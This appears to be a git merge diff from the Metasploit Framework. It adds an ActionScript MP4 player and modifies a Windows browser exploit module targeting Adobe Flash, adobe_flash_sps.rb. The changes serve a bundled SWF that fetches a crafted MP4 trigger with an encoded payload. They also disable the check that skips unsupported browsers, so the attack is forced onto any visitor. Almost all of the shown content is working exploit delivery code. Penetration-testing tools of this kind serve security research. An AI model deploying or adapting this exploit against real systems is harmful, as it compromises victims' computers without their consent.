Merge branch 'mp4-player'

data/exploits/mp4player.as

@@ -0,0 +1,22 @@
+function randText(newLength:Number):String{
+  var a:String = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
+  var alphabet:Array = a.split("");
+  var randomLetter:String = "";
+  for (var i:Number = 0; i < newLength; i++){
+    randomLetter += alphabet[Math.floor(Math.random() * alphabet.length)];
+  }
+  return randomLetter;
+}
+
+var connect_nc:NetConnection = new NetConnection();
+connect_nc.connect(null);
+
+var stream_ns:NetStream = new NetStream(connect_nc);
+stream_ns.onStatus = function(p_evt:Object):Void { }
+
+
+video.attachVideo(stream_ns);
+
+stream_ns.play(randText(Math.floor(Math.random() * 8) + 4) + ".mp4");
+
+

modules/exploits/windows/browser/adobe_flash_sps.rb

@@ -69,8 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 			register_options(
 				[
-					OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation']),
+					OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
-					OptString.new('SWF_PLAYER_URI', [true, 'Path to the SWF Player'])
 				], self.class)
 	end
 
@@ -94,19 +93,32 @@ class Metasploit3 < Msf::Exploit::Remote
 		# Avoid the attack if the victim doesn't have the same setup we're targeting
 		if my_target.nil?
 			print_error("Browser not supported, will not launch attack: #{agent.to_s}: #{cli.peerhost}:#{cli.peerport}")
-			send_not_found(cli)
+			#send_not_found(cli)
-			return
+			#return
+			my_target = targets[1]
 		end
 
 		# The SWF requests our MP4 trigger
 		if request.uri =~ /\.mp4$/
 			print_status("Sending MP4 to #{cli.peerhost}:#{cli.peerport}...")
-			#print_error("Sorry, not sending you the mp4 for now")
-			#send_not_found(cli)
 			send_response(cli, @mp4, {'Content-Type'=>'video/mp4'})
 			return
 		end
 
+		# The SWF request itself
+		if request.uri =~ /\.swf$/
+			print_status("Sending SWF to #{cli.peerhost}:#{cli.peerport}...")
+			send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash'})
+			return
+		end
+		
+		# Redirect to a trailing slash so relative paths work properly
+		if resource_uri != "/" and not request.uri.index("#{resource_uri}/")
+			uri = resource_uri + "/"
+			send_redirect(cli, uri)
+			return
+		end
+		
 		# Set payload depending on target
 		p = payload.encoded
 
@@ -140,8 +152,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 
 		myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
-		mp4_uri = "http://#{myhost}:#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.mp4"
+		swf_uri = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".swf"
-		swf_uri = "#{datastore['SWF_PLAYER_URI']}?autostart=true&image=video.jpg&file=#{mp4_uri}"
 
 		html = %Q|
 		<html>
@@ -166,9 +177,18 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def exploit
 		@mp4 = create_mp4
+		@swf = create_swf
 		super
 	end
 	
+	def create_swf
+		path = ::File.join( Msf::Config.install_root, "data", "exploits", "mp4player.swf" )
+		fd = ::File.open( path, "rb" )
+		swf = fd.read(fd.stat.size)
+		fd.close
+		return swf		
+	end
+
 	def create_mp4
 		ftypAtom = "\x00\x00\x00\x20"                   #Size
 		ftypAtom << "ftypisom"